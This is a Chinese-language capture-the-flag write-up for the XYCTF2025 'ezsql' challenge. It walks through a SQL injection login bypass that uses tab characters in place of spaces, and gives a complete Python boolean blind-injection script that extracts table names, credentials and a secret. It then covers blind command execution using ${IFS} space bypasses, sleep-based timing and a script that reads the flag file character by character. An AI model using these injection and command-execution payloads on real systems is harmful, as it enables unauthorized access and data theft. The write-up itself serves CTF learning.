XYCTF2025-ezsql(手动滑稽)

比赛复现布尔盲注逗号过滤 +%09绕过空格过滤无回显命令执行命令执行时间盲注

Created At : 2025-04-08 15:19

Count:789 Views 👀 :

XYCTF2025-ezsql(手动滑稽)

XYCTF2025-ezsql(手动滑稽)

打开就是一个登录界面

尝试了一下注入发现username传参可以注入，password我们输入都会被转义前面会被添加反引号，而且这里username存在空格过滤，我们可以使用tab即%09来绕过空格过滤

1	`username='%09or%091=1%09#&password=1`

发现跳转到了doublecheck.php，试了一下也没有注入，还要我们输入密钥，我们可以在login.php界面进行布尔盲注，注意到逗号也被过滤了，

1	`使用substr(xxx from x for y)代替substr(xxx,x,y)`

python脚本

import requests as r


url = 'http://eci-2ze3h973qy7uqodho0gc.cloudeci1.ichunqiu.com/login.php'

value = ''
i = 1

while True:
    low, high = 0, 127
    char_ascii = 0
    
    while low <= high:
        mid = (low + high) // 2

        # payload = f"' OR ascii(substr(database() from {i} for {i})) > {mid}#"   # testdb
        # payload = f"' OR ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='testdb') from {i} for {i})) > {mid}#" # double_check,user
        # payload = f"' OR ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='double_check') from {i} for {i})) > {mid}#" # secret
        # payload = f"' OR ascii(substr((select group_concat(secret) from double_check) from {i} for {i})) > {mid}#" # dtfrtkcc0czkoua9S
        # payload = f"' OR ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='user') from {i} for {i})) > {mid}#" # username,password
        # payload = f"' OR ascii(substr((select group_concat(username) from user) from {i} for {i})) > {mid}#" # yudeyoushang
        payload = f"' OR ascii(substr((select group_concat(password) from user) from {i} for {i})) > {mid}#" # zhonghengyisheng

        data = {
            'username': payload.replace(" ", "\t"),
            'password': '1'
        }

        result = r.post(url, data=data, allow_redirects=False)

        oracle = not "帐号或密码错误" in result.text
        
        if oracle:
            low = mid + 1
        else:
            high = mid - 1
    
    if high < 0:
        break
    
    char_ascii = high + 1
    if char_ascii == 0:
        break
    
    value += chr(char_ascii)
    print(f"Current: {value}")
    i += 1

print(f"Final value: {value}")

把东西全都注出来，然后用拿到的账号密码还有secret登录

1
2
3

username = yudeyoushang
password = zhonghengyisheng
secret = dtfrtkcc0czkoua9S

登录成功发现是一个命令执行的页面，无回显。

测试了一下发现存在空格过滤，可以用${IFS}代替空格绕过，试一下

1	`sleep${IFS}2`

发现响应速度变慢了，说明可以执行命令。

将ls /执行后的输出结果写入到flag.txt中。

1	`ls${IFS}/${IFS}>${IFS}flag.txt`

访问就能看到flag.txt了

然后直接将其写入到flag.txt中

1	`cp${IFS}/flag.txt${IFS}flag.txt`

再次访问flag.txt，就拿到flag了

或者使用命令执行盲注脚本爆出flag

import requests
import time

# from urllib.parse import quote as urlen
headers = {"Cookie": "PHPSESSID=a6994f9023a9a18160be0b7741d991ad"}  # 需要根据具体值修改
char = "1234567890_.qwertyuiopasdfghjklzxcvbnmQAZWSXEDCRFVTGBYHNUJMIK{}OLP"
flag = ""
url = 'http://gz.imxbt.cn:20473/index.php'
for x in range(1, 10):
    flag += '---'
    for i in range(1, 30):
        for j in char:
            payload = "if        [        `cat        /fla*        |        awk        'NR=={}'        |        cut        -c{}`        =        {}        ];then        sleep        0.5;fi".format(x, i, j)  # 延迟根据实际⽹络情况修改
            data = {"command": payload}
            start_time = time.time()
            response = requests.post(url=url, headers=headers, data=data)
            end_time = time.time()
            if end_time - start_time > 0.5:
                flag += j
                print(flag)

转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。